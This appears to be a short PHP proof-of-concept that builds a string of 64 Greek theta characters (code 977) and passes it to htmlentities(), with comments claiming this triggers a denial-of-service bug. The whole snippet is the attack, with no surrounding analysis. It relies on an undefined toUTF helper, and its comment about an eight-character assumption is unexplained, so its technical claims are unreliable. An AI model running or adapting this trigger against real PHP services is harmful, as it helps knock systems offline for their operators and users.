for($i=0; $i < 64; $i++) { $str1 .= toUTF(977); //MUST start with 977 before bit-shifting }
htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here /* htmlentities() method automatically assumes it is a max of 8 chars. uses greek theta character bug from UTF-8 */